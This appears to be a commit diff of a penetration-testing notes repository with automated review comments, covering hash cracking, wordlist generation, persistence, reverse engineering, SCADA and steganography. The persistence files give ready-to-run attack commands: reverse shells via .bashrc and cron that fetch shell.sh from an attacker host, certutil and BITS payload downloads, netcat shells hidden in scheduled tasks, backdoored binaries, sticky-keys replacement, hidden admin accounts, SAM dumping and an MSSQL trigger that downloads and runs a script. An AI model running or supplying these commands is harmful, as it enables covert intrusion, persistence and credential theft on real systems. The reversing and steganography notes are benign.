sha1md5pass(h); sha1md5passsalt(h); sha1md5sha1pass(h); sha1sha1pass(h); sha1sha1passsalt(h); 
sha1sha1passsubstrpass03(h); sha1sha1saltpass(h); sha1sha1sha1pass(h); sha1strtolowerusernamepass(h)
if len(jerar)==0:
print("\n Not Found.")
elif len(jerar)>2:
jerar.sort()
print("\nPossible Hashs:")
print("[+] "+str(algorithms[jerar[0]]))
print("[+] "+str(algorithms[jerar[1]]))
print("\nLeast Possible Hashs:")
for a in range(int(len(jerar))-2):
print("[+] "+str(algorithms[jerar[a+2]]))
else:
jerar.sort()
print("\nPossible Hashs:")
for a in range(len(jerar)):
print("[+] "+str(algorithms[jerar[a]]))
first = None
except KeyboardInterrupt:
print("\n\n\tBye!")
exit()
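Review bot: `jerar.append("1094202")` in `sha1md5pass` has an extra digit; every other code is six digits, and since the codes are used as keys into `algorithms` (`print("[+] "+str(algorithms[jerar[0]]))`), a hash that satisfies that check will raise a `KeyError`, which the loop's `except KeyboardInterrupt` does not catch, so the program crashes instead of reporting. In the long dispatch line, `md5saltmd5pass(h)` and `md5saltmd5passsalt(h)` are each called twice, so their codes are appended twice and printed twice; putting the checker functions in a list and iterating it (with `jerar` de-duplicated via `set`) would remove both the repetition and the risk of missing one. The bare `except:` around `argv[1]` should be `except IndexError` so that other errors are not silently swallowed.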

Hashes/Scripts/hash_cracker.py Executable file

@ -0,0 +1,20 @@
#!/usr/bin/env python
import hashlib
import pyfiglet
print(pyfiglet.figlet_format("md5 cracker"))
wordlist_location = str(input("Wordlist file location: "))
hash_input = str(input("Enter hash to be cracked: "))
with open(wordlist_location, 'rb') as _f:
for line in _f.readlines():
line = line.strip()
hash_ob = hashlib.sha256(line)
#hash_ob = hashlib.md5(line)
hashed_pass = hash_ob.hexdigest()
print(line)
if hashed_pass == hash_input:
print("Password found: " + line.decode())
exit(0)
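Review bot: the banner and the file name say md5, but the loop hashes candidates with `hashlib.sha256` (the `hashlib.md5` line is commented out), so an MD5 input can never match; either keep one algorithm and name the script accordingly, or pick the algorithm from the digest length (32 hex characters for MD5, 64 for SHA-256). The comparison should also normalise the user input (`hash_input.strip().lower()`), since a trailing newline or upper-case hex would silently fail, and `for line in _f:` avoids reading the whole wordlist into memory as `_f.readlines()` does. Nothing is printed when the wordlist is exhausted, so add a "not found" message after the loop.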

Hashes/Wordlists.md Normal file

@ -0,0 +1,48 @@
# Generate Wordlists
* [username_generator](https://github.com/therodri2/username_generator.git)
* [CeWL](../enumeration/CeWL/README.md)
* [Mentalist](https://github.com/sc0tfree/mentalist.git)
* [lyricpass](https://github.com/initstring/lyricpass.git)
* [pnwgen phonenumbers](https://github.com/toxydose/pnwgen.git)
## Cupp
* [cupp](https://github.com/Mebus/cupp.git)
* Interactive dialogue via `cupp.py -i`
* Wordlistdownload via `cupp.py -l`
* Connections to alecto DB via `-a`
## crunch
```sh
crunch <minlen> <maxlen> <charPool> -o <output.file>
```
* Option `-t` specifies variable characters
* `@`, lower case alpha characters
* `,`, upper case alpha characters
* `%`, numeric characters
* `^`, special characters including space
```sh
crunch 8 8 -t passw%%rd
```
## ttpassgen
* [ttpassgen](https://github.com/tp7309/TTPassGen.git)
* Generate lists from the ground up
* `pip install ttpassgen`
```sh
ttpassgen --rule '[?d]{6:6:*}' 6digitpins.txt
```
```sh
ttpassgen --rule '[?l]{1:5:*}' all_letter_combinations.txt
```
```sh
ttpassgen --dictlist "in.txt,in2.txt" --rule '$0[_]?$1' -s " " out.txt
```
# exrex
* Generate all possible outcomes from regex string
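Review bot: `# exrex` at the end is a level-1 heading while the other tools (`## Cupp`, `## crunch`, `## ttpassgen`) are level 2, so it renders as a second document title rather than a sibling section; make it `## exrex`, and a link to the project would match the style of the other entries. `Wordlistdownload` in the Cupp section should be `Wordlist download`.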

Persistence/bashrc.md Normal file

@ -0,0 +1,8 @@
# Bashrc Bogus
## Add Reverse Shell
```sh
echo 'bash -c "bash -i >& /dev/tcp/<attacker-IP>/<attacker-Port> 0>&1"' >> ~/.bashrc
```

Persistence/crontab.md Normal file

@ -0,0 +1,15 @@
# Cronjobs
* `crontab -l`
* `cat /etc/crontab`
## Add Cronjob
* Add line
```sh
* * * * * root curl http://<attacker-IP>:8000/shell.sh | bash
```
* Shell content
```sh
bash -c "bash -i >& /dev/tcp/<attacker-IP>/<attacker-Port> 0&1"
```
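Review bot: the last line of the shell content ends in `0&1`, whereas bashrc.md in the same commit writes the same command with `0>&1`; one of the two is a typo and the two files should agree.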


@ -0,0 +1,6 @@
# Meterpreter Persistence
## Load shell on system startup
```sh
run persistence -X
```

Persistence/persistence.md Normal file

@ -0,0 +1,323 @@
# Persistence
* Gain through
* Startup folder persistence
* Editing registry keys
* Scheduled tasks
* SUID
* BITS
* Creating a backdoored service
* Creat user
* RDP
## Gain Persistence on Windows
* Browser. Add to trusted sites.
* Powershell
```sh
Invoke-WebRequest http://<attacker-IP>:<attackerPort>/shell.exe -OutFile .\shell2.exe
```
* DOSprompt
```cmd
certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port/shell.exe
```
* Use `multi/handler` on attacker and `set PAYLOAD windows/meterpreter/reverse_tcp`
### Paths to Persistence
* Put in startup directory
```sh
C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
```
* Put the reverse_shell into `%appdata%` and add a registry key
```sh
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\<USER>\AppData\Roaming\backdoor.exe"
```
### Background Intelligence Transfer Service (BITS)
```sh
bitsadmin /create __shell__
bitsadmin /addfile __shell__ "http://<attacker-IP>:<attacker-Port>/shell2.exe" "C:\Users\<USER>\Documents\shell2.exe"
```
```sh
bitsadmin /SetNotifyCmdLine 1 cmd.exe "/c shell2.exe /complete __shell__ | start /B C:\Users\<USER>\Documents\shell2.exe"
bitsadmin /SetMinRetryDelay 30
bitsadmin /resume
```
## Elevate Privileges
* Create user `net user /add <user> <pass>`
* Add to admin group via `net localgroup administrators <user> /add`
* Check `net localgroup Administrator`
### More stealthy
* Backup Operator group is more stealthy, no admin by r/w on files
```sh
net localgroup "Backup Operators" <user> /add
net localgroup "Remote Management Users" <user> /add
```
* The following two groups are assigned through membership of `Backup Operators`
* SeBackupPrivilege, read files
* SeRestorePrivilege, write files
* Any local group is stripped of off its admin permissions when logging in via RDP. Therefore disable the following regkey via
```sh
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
```
* Afterwards, check if `Backup Operators` is enabled via `whoami /groups`
* Backup `SAM` and `SYSTEM` via
```sh
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
secretsdump.py -sam sam.bak -system system.bak LOCAL
```
* Pass-the-hash via evil-winrm
### secedit
* Get r/w on files through editing a config file
* Export secedit and open it
```sh
secedit /export /cfg config.inf
```
* Add user to the groups
```sh
SeBackupPrivilege = [...],<username>
SeRestorePrivilege = [...],<username>
```
* Convert the file
```sh
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.infk
```
* Add the user to the RDP group via net localgroup like before or do
```sh
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
```
* Add & Click user -> Full Control(All Operations)
* Set `LocalAccountTokenFilterPolicy` to `1` like in the section before
### Relative ID (RID)
* UID like in linux
* Administrator has `RID = 500`
* Other interactive users `RID >= 1000`
* Get RIDs
```sh
wmic useraccount get name,sid
```
* Assign `500` to regular user
```sh
PsExec64.exe -i -s regedit
```
* Open `HKLM\SAM\SAM\Domains\Account\Users\<0xRID>`
* Search for RID value as hexadecimal value
* Open the key called `F` and change effective RID at position `0x30`
* Insert LE hex of `0d500`, which is `f401`
## Add to registry
* Execute on user logon via
```sh
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f
```
## Add a Service
### Meterpreter
* Inside meterpreter `load powershell` and `powershell_shell`
```sh
New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Boot"
```
### Powershell
* Start a service automatically
```sh
sc.exe create SteamUpdater binPath= "net user Administrator Passwd123" start= auto
sc.exe start SteamUpdater
```
* Use a service PE instead
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe-service -o SteamUpdater.exe
```
* Modify an existing service
* Enumerate all the services
```sh
sc.exe query state=all
```
* Info about a specific service, start type should be automatic, service start name should be target user
```sh
sc.exe qc <ServiceName>
```
* Reconfigure
```sh
sc.exe config FoundService binPath= "C:\Windows\SteamUpdater.exe" start= auto obj= "LocalSystem"
sc.exe start FoundService
```
## Add Scheduled Task
```sh
$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe
$B = New-ScheduledTaskTrigger -AtLogOn
$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest
$D = New-ScheduledTaskSettingsSet
$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D
Register-ScheduledTask ReverseShell -InputObject $E
```
* Alternatively via `schtasks`
```sh
schtasks /create /sc minute /mo 1 /tn SteamUpdater /tr "c:\windows\temp\nc.exe -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" /ru SYSTEM
```
* Check task
```sh
schtasks /query /tn SteamUpdater
```
* Deleting Security Descriptor of a task to make it invisible. Delete the following key
```sh
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\<taskname>\SD
```
## File Backdoor
### Mimic PE
```sh
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=$ATTACKER_IP lport=$ATTACKER_PORT -b "\x00" -f exe -o puttyX.exe
```
### Reference Script
* Recycle shortcut of an app to reference a reverse shell script
* Right click -> `Properties` -> `Target`
* Reference the the script `certainlynobackdoor.ps1` via
```sh
powershell.exe -WindowStyle hidden C:\Windows\System32\certainlynobackdoor.ps1
```
* Content of the script `certainlynobackdoor.ps1`
```sh
Start-Process -NoNewWindow "c:\tools\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\System32\calc.exe
```
### File Association
* Change associated `ProgID` of a file type inside registry `HKLM\Software\Classes\`
* Choose a class and `<class>/shell/open/command` contains the file to be opened as the first argument `%1`
* Chang the argument to a shell script and pass the arg through it
```sh
Start-Process -NoNewWindow "c:\windows\temp\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\system32\NOTEPAD.EXE $args[0]
```
* Change `command\default` to `powershell -windowstyle hidden C:\windows\temp\steamupdater.ps1 %1`
## Persistence via Logon
### Startup directories
* Users' Startup directory under
```sh
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
```
* Startup directory for all users, put the reverse shell here
```sh
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
```
### Registry Keys
* `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* Create `Expandable String Value` under any of this keys with the value of the reverse shell path
* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\` loads user profile after authentication is done
* Either `shell` or `Userinit` can be appended with a comma separated command
### Logon Scripts
* `userinit.exe` checks var `UserInitMprLogonScript` which cann be used to load logon scripts
* Create variable `UserInitMprLogonScript` under `HKCU\Environment` which gets the reverse shell as a payload
## RDP or Login Screen
### Sticky Keys
* Press shift x 5 and `C:\Windows\System32\sethc.exe` will be executed
* Take ownership of the binary via
```sh
takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
```
* Overwrite with `cmd.exe`
```sh
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
```
### Utilman
* Ease of access button is clickable at the login screen, it is executed with system privileges
* Take ownership and overwrite with `cmd.exe`
```sh
takeown /f c:\Windows\System32\utilman.exe
icacls C:\Windows\System32\utilman.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
```
## Web Shell
* Default user is `iis apppool\defaultapppool`
* Has `SeImpersonatePrivilege`
* [Download Web Shell](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx)
* Move shell to `C:\inetpub\wwwroot` on target
* Get the shell via `http://$TARGET_IP/shell.aspx`
## MSSQL
* Triggers bind actions such as INSERTs
* Open Microsoft SQL Server Management Studio
* Choose windows auth
* `New Query`
* Enable Advance Options via
```sh
sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO
sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO
```
* Grant privileges to all users
```sh
USE master
GRANT IMPERSONATE ON LOGIN::sa to [Public];
```
* Change to DB
```sh
USE <DATABASE>
```
* Create trigger
```sh
CREATE TRIGGER [sql_backdoor]
ON HRDB.dbo.Employees
FOR INSERT AS
EXECUTE AS LOGIN = 'sa'
EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"';
```
* Trigger the trigger by visiting the site which triggers the trigger through a db call
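Review bot: several commands in this file will not run as typed and should be corrected before someone copies them: in the scheduled-task block, `-Argument "/c C"\Users\Administrator\Documents\rshell.exe` closes the quote after `C` instead of after the path, and `"NT AUTHORITY/SYSTEM"` uses a forward slash where the account name takes a backslash; in the secedit section, `secedit /configure /db config.sdb /cfg config.infk` references `config.infk` while the export wrote `config.inf`; and the certutil URL is missing the `>` after `<attacker-Port`. Typos in the prose: `Creat user`, `Chang the argument`, `the the script`, and `Background Intelligence Transfer Service` (the service is the Background Intelligent Transfer Service).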

Persistence/wmi.md Normal file

@ -0,0 +1,3 @@
# WMI Backdoor
* [BlackHat 2015, Backdoor](https://github.com/mattifestation/WMI_Backdoor.git)


@ -0,0 +1,81 @@
# Misc
* `Dalvik` is the JVM of Android
## SMALI
* `SMALI` is the byte code derived from Java.
* Types
```
V void
Z boolean
B byte
S short
C char
F float
I int
J long
D double
[ array
```
### Registers
* Registers are 32 bits
* Type long and double use two registers 32+32=64 bits
* `.registers`, total number of regs in method
* `.locals`, non parameter regs in method
* Arguments of a method are put into registers from highest to lowest.
* The object itself is a parameter to its method.
* Register naming schemes are
* Normal local register are name v0, v1, v2 ...
* Parameter register are a second naming on top, e.g.v2 and p0 or v3 and p1 are the same registers.
## APK Structure
* `AndroidManifest.xml`, binary XML
* `classes.dex`, app code compilation as dex
* `resource.arsc`, precompiled resources in XML
* `res`, resource dir
* `assets` app assets
* `lib`, libraries
* `META/INF`, contains metadata file `MANIFEST.MF` and signature of the apk.
## Tools
* `jadx -d <outdir> <apk or dex>` as a decompiler
* dex2jar to convert apk to jar
```sh
d2j-dex2jar.sh /path/application.apk
```
* Dex to smali with `d2j-dex2smali`
* jd-gui as decompiler
* `apktool` smali source from apk
* [Firebase scanner](https://github.com/shivsahni/FireBaseScanner.git)
* [Mara reversing framework](https://github.com/xtiankisutsa/MARA_Framework.git)
* [Mobile Security Framework](https://github.com/MobSF/Mobile-Security-Framework-MobSF.git)
* Proguard deobfuscates code
* [PID Cat log reader](https://github.com/JakeWharton/pidcat.git)
* Burpsuite listener on Android emulator
* [Drozer](https://github.com/FSecureLABS/drozer)
```sh
adb forward tcp:31415 tcp:31415
drozer console connect
run app.package.list -> see all the packages installed
run app.package.info -a -> view package information.
run app.package.attacksurface package_name
run app.activity.info -f package_name
run app.activity.start --component package name component_name
```
```sh
run app.provider.info -a package_name
run scanner.provider.finduris -a package_name
run app.provider.query uri
run app.provider.update uri --selection conditions selection_arg column data
run scanner.provider.sqltables -a package_name
run scanner.provider.injection -a package_name
run scanner.provider.traversal -a package_name
```
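Review bot: the "Proguard deobfuscates code" bullet under Tools is inverted: ProGuard shrinks and obfuscates (renames classes, methods and fields); its `mapping.txt` output used with `retrace` is what de-obfuscates stack traces. Two names in APK Structure are wrong as well: the directory is `META-INF`, not `META/INF`, and the resource table is `resources.arsc`, not `resource.arsc`. The SMALI type list omits `L<package/Class>;` for object references, which is the one you meet most often when reading method signatures. Minor: Dalvik has been replaced by ART as the Android runtime since Android 5.0, and smali is the human-readable assembly form of dex bytecode rather than "the byte code derived from Java"; "e.g.v2" needs a space.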

@ -0,0 +1,97 @@
# Deobfuscation
## Principles of Obfuscation
* Software obfuscation may be divided into a theoretical layered approach, done by [Hui Xu et. al](https://cybersecurity.springeropen.com/track/pdf/10.1186/s42400-020-00049-3.pdf)
* These layers and what's obfuscated are:
* __Code Element__
* Layout
* Controls
* Data
* Classes
* Methods
* __Software Component__
* __Inter Component__
* Library calls
* Used Resources
* __Application__
* DRM System
* Neural Networks
## Evade Statical Rules
* Critical data is obfuscated by the __Code Element__ layer which contains the following methods of obfuscation
* __Array Transformation__
* __Data Encoding__
* __Data Procedurization__
* __Data Splitting & Merging__
### Splitting & Merging of Strings
* Breaking signature by modifying data distribution inside the code
* This may be done by modifying strings and functions through following measures
* __Joining__
```python
"CAFFEE" + "BABE"
```
* __Reordering__
```python
a = "BABE"
b = "CAFFEE"
f"{b}{a}"
```
* __Whitespaces of functions which are not interpreted__
```c
int main ( void ) {
printf ( "The answer is %d", 42 ) ;
}
```
* __Adding ticks which are not interpreted__
* __Change `uPpER aNd loWeRcAsE oF cHaRaCtErS iN tHe StRinG`__
### Adding Unnecessary Instructions
* Obfuscation of layout and controls inside the code
* __Junk Stubs__
* __Separation of Related Code__
* __Stripping Redundant Symbols__
* __Meaningless Identifiers__
* __Converting Explicit to Implicit Instructions__
* __Dispatcher Based Controls Executed During Runtime__
* __Probabilistic Control Flows__
* __Bogus Control Flows__
### Control Flow
* Changing or adding to the flow of the code through change of conditions
* Changes may be set to arbitrary code segments by __Opaque Predicates__
* An __Opaque Predicate__ is a control path and value known by the obfuscater and hard to find out by the reverse engineer
### Protecting Data
* Stripping and protecting
* __Code Structure__
* __Object names__
* __File & Compilation Properties__
* To strip symbols
```sh
strip --strip-all <binary>
```
* Check via
```sh
nm <binary>
```
## Usage
* Find a deobfuscator like [de4dot](https://github.com/de4dot/de4dot.git) for e.g. deobfuscating dotfuscator
* In case of dotnet: __Do not only use ghidra for reversing, use [ILSpy](https://github.com/icsharpcode/ILSpy.git) as well__
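Review bot: the Joining example under "Splitting & Merging of Strings" does not survive compilation as written: CPython folds `"CAFFEE" + "BABE"` into the single constant `"CAFFEEBABE"` at compile time, so the split exists only in the source text and not in the `.pyc` a static rule would scan; the f-string variant under Reordering does keep the pieces apart. The section should say which artifact (source vs. bytecode/binary) each technique is meant to evade. Under "Protecting Data", it helps to state the expected result of the check: `nm` on a stripped binary prints "no symbols", and `file <binary>` reports "stripped". Typos: "Evade Statical Rules" should be "Static", "Hui Xu et. al" should be "et al.", "obfuscater" should be "obfuscator".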

@ -0,0 +1,9 @@
# DLL Reversing
* Start DLL on its own with the help a wrapper
```C#
HMODULE dll = LoadLibraryA("DLL.DLL");
typedef void(WINAPI* Add_TypeDef)(int, int); // Add(int x, int y)
Add_TypeDef Add = (Add_TypeDef)GetProcAddress(dll, "Add_MangledName");
Add(1, 2);
```
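Review bot: the fence is tagged `C#` but the snippet is C/C++ (`typedef`, `WINAPI`, a cast of `GetProcAddress`); tag it `c` or `cpp` and add `#include <windows.h>`. Neither return value is checked: `LoadLibraryA` returns NULL when the DLL is not found and `GetProcAddress` returns NULL when the export name does not match, so `Add(1, 2)` would call through a null pointer; guard both before the call and `FreeLibrary(dll)` afterwards. The `"Add_MangledName"` comment could say where the decorated name comes from, e.g. `dumpbin /exports DLL.DLL`.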

@ -0,0 +1,35 @@
# Reversing Firmware
## Tools
* binwalk
* unlzma
* tar
* [fat](https://github.com/attify/firmware-analysis-toolkit.git)
* Create usable environment and start firmware inside it
```sh
./fat.py <firmware>
```
* [Jefferson](https://github.com/sviehb/jefferson) or AUR package `jefferson-git`
## Usage
* Check image via `strings`
* Check CRC via `cksum -a crc <image>`
* Use `binwalk` to extract. There are to methods
* `-e` extract by offset
* `--dd=".*"` by file extension
### Mount JFFS2 File
* Use kernel where `CONFIG_MTD_RAM` is set. Using Arch this is any kernel before `5.10`
```sh
rm -rf /dev/mtdblock0
mknod /dev/mtdblock0 b 31 0
mkdir /mnt/jffs2
modprobe jffs2
modprobe mtdram
modprobe mtdblock
dd if=<jffs2File> of=/dev/mtdblock0
mount -t jffs2 /dev/mtdblock0 /mnt/jffs2/
```
## Tips & Tricks
* Watch out for `HNAP` and `JNAP` as [an attack vector](https://routersecurity.org/hnap.php)
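Review bot: the "Mount JFFS2 File" steps silently fail for images larger than the default `mtdram` device: `mtdram` defaults to `total_size=4096` (KiB) and `erase_size=128` (KiB), so `dd` into `/dev/mtdblock0` truncates a larger image, and a JFFS2 image built with a different erase block size mounts with errors or not at all. Pass `modprobe mtdram total_size=<KiB> erase_size=<KiB>` matching the image (binwalk prints the erase size in its JFFS2 signature line), and move that `modprobe` before the `dd`, which the listing already does. Also `rm -rf` on a device node is just `rm -f`; in "There are to methods" read "two"; and `--dd=".*"` extracts by matched signature description, not by file extension, while `-e` runs the built-in extractors for every recognised signature.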

@ -0,0 +1,4 @@
# Function Decoration
* Done to imported functions in order to do interpositioning and identify the variants of the function.
* [name mangling](https://en.wikipedia.org/wiki/Name_mangling)

@ -0,0 +1,17 @@
# Krakatau
## Usage
* Get bytecode from `jar` file
```sh
krakatau-disassemble -r file.jar -out dissassemble.zip
```
* Generate bytecode
```sh
krakatau-assemble -out result.jar -r dissassembled/
```
* Do changes to the bytecode
* Compile jar file
```sh
java -cp result.jar <fileNameOfMainClass>
```
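Review bot: the steps are out of order and the last one is mislabeled: "Do changes to the bytecode" belongs between disassembling and `krakatau-assemble`, since assembling is what turns the edited `.j` files back into `result.jar`, and `java -cp result.jar <fileNameOfMainClass>` runs the jar rather than compiling it, so the bullet should read "Run". The artefact names also do not line up: disassembly writes `dissassemble.zip` but assembly reads `dissassembled/`, so an unzip step is missing, and both are misspelled ("disassemble").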

@ -0,0 +1,33 @@
# Portable Executable
* [Windows PE doc](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format)
* An executable binary in the windows world
The file format consists of
* PE Header
* Data Sections
## Data Section
The data section consists of
* __.text__, program code
* __.data__, initialized variables
* __.bss__, unanitialized variables
* __.edata__, exportable objects and related table info
* __.idata__, imported objects and related table info
* __.reloc__, image relocation info
* __.rsrc__, links external resources, e.g. icons, images, manifests
## Starting a PE
If a process starts, the PE is read in the following order
1. Header sections
* File signatue is __MZ__, and magic number are read
* Architecture of the platform
* timestamp
2. Section table details is parsed
3. Content is mapped into memory based on
* Entry point address and offset of ImageBase
* Relative Virtual Address (RVA), addresses related to Imagebase
4. Libraries and imports are loaded
5. Entrypoint address of the main function is run
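Review bot: step 1 of "Starting a PE" conflates two signatures: `MZ` is the DOS header magic (`e_magic`), while the PE signature is `PE\0\0` at the offset stored in `e_lfanew`; the loader checks both. Step 5 overstates: the entry point (`AddressOfEntryPoint`) is the CRT start-up routine, which then calls `main`/`WinMain`, not `main` itself. Typos: "unanitialized" should be "uninitialized", "signatue" should be "signature", and "Section table details is parsed" should be "are parsed".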

@ -0,0 +1,7 @@
# Reverse Engineering References
## Debugger
[scdbg](https://github.com/dzzie/SCDBG.git)

@ -0,0 +1,35 @@
# Supervisory Control and Data Acquisition (SCADA)
* SCADA works as an aggregatio of the following systems
* __Programmable Logic Controllers (PLC)__, monitoring sensors and controlling devices.
* __Remote Terminal Unit (RTU)__, use for wide area telemetry
* __Human Machine Interface (HMI)__, supervisory through an operator. Interaction through human user input.
* __Communication network__
* Security is no first class citizen
## Modbus
* Developed by Modicon
* Master/Slave, latter has an 8 bit address.
* RS-485 Connector
* Data registers 16 bit
* Input register, 16 bit ro
* Hold register, rw
* Coil register, 1 bit rw
* Discrete register, 1bit ro
### Function Codes
* [Modbus101](https://www.csimn.com/CSI_pages/Modbus101.html)
* RTU request inside of TCP segments, port 502
* 1 __Read Coil__
* 2 __Read Discrete Input__
* 3 __Read Holding Registers__
* 4 __Read Input Registers__
* 5 __Write Single Coil__
* 6 __Write Single Holding Register__
* 15 __Write Multiple Coils__
* 16 __Write Multiple Holding Registers__
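Review bot: "RTU request inside of TCP segments, port 502" under Function Codes is inaccurate: Modbus TCP wraps the PDU in the 7-byte MBAP header (transaction id, protocol id, length, unit id) and drops the RTU CRC; "Modbus RTU over TCP" is a separate variant that keeps the serial frame. The unit identifier field is what carries the 8-bit slave address over TCP, which ties back to the "Master/Slave" bullet. Wording: "aggregatio" should be "aggregation", "use for wide area telemetry" should be "used for", "Security is no first class citizen" should be "not a first-class citizen", and "Discrete register" is "Discrete input".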

@ -0,0 +1,2 @@
# Outguess
`man outguess`

@ -0,0 +1,10 @@
# Steganography Tools
[Stego-Toolkit](https://github.com/DominicBreuker/stego-toolkit.git)
[OutGuess](https://github.com/resurrecting-open-source-projects/outguess)
[Remnux Docs](https://docs.remnux.org/)
[Steghide](http://steghide.sourceforge.net/)
[Stegbrute](https://github.com/R4yGM/stegbrute)
[stegoVeritas](https://github.com/bannsec/stegoVeritas)
[zsteg](https://github.com/zed-0xff/zsteg)

24
Steganography/Remnux.md Normal file
@ -0,0 +1,24 @@
# ReMnux
* [Documentation](https://docs.remnux.org/)
## Tools
### Peepdf
* Extracting JS from PDF using config file into `js_from_pdf.js`
```sh
echo 'extract js > js_from_pdf.js' > extract_js.conf
peepdf -s extract_js.conf <file.pdf>
```
### vmonkey
* Detects malicious VBasic code in documents.
```sh
vmonkey <file.doc>
```
### Packaged Binaries
* Can be identified via entropy or loaded libs
* The count of libs loaded by a packaged bin is very low. A packaged PE could load `GetProcAddress` or `LoadLibrary`.
* [PEiD](https://www.aldeid.com/wiki/PEiD) detects most packers.
* File [Entropy](https://fsec404.github.io/blog/Shanon-entropy/) of a packaged is high.
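Review bot: "Packaged Binaries" should be "Packed" throughout, and the import indicator is misstated: a packed PE typically has a very small import table, often only `LoadLibraryA`/`GetProcAddress` from kernel32, because the unpacking stub resolves the real imports at run time; the number of imported functions, not the number of loaded libraries, is the tell, and section entropy near 8 is the other. Under vmonkey, `vmonkey` (ViperMonkey) emulates VBA macros to expose what they do rather than only detecting them, and "VBasic" should be "VBA". "of a packaged is high" should be "of a packed binary is high".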

@ -0,0 +1,9 @@
# Stegbrute
Bruteforce stego jpegs with a password.
* install via `cargo install stegbrute`
## Usage
```sh
stegbrute -f <filename> -w <wordlist>
```

@ -0,0 +1,8 @@
# Steghide
* JPGs only
* Example
```sh
steghide extract -sf jpeg1.jpeg
```
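Review bot: "JPGs only" is wrong: steghide embeds in JPEG, BMP, WAV and AU cover files, so the bullet should list those. The example should also mention that `extract` prompts for the passphrase unless `-p <passphrase>` is given, which matters when scripting it.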

@ -0,0 +1,15 @@
#!/usr/bin/env python
def xor(data, key):
keylen = len(key)
return bytearray((
(data[i] ^ key[i % keylen]) for i in range(0,len(data))
))
if __name__ == "__main__":
data = bytearray(open('topsecret.txt', 'rb').read())
key = b'key'
res = xor(data, key)
print(res.decode())
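Review bot: `print(res.decode())` in the `__main__` block raises `UnicodeDecodeError` whenever the XOR output is not valid UTF-8, which is the normal case when encrypting rather than decrypting; write the raw bytes instead (`sys.stdout.buffer.write(res)` or to an output file). The input file is opened without `with`, so the handle is never closed; the `bytearray(...)` wrapper around `.read()` is unnecessary because indexing `bytes` already yields ints; and `range(0, len(data))` can be `range(len(data))`. The rendered page also lacks this file's name header, so the script's path should be checked in the commit.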

@ -0,0 +1,3 @@
# Stegoveritas
* Install via `pip install stegoveritas` and `stegoveritas_install_deps`

8
Steganography/Zsteg.md Normal file
@ -0,0 +1,8 @@
# zsteg
* PNGs, BMPs
* Example
```sh
zsteg png1.png --strings all
```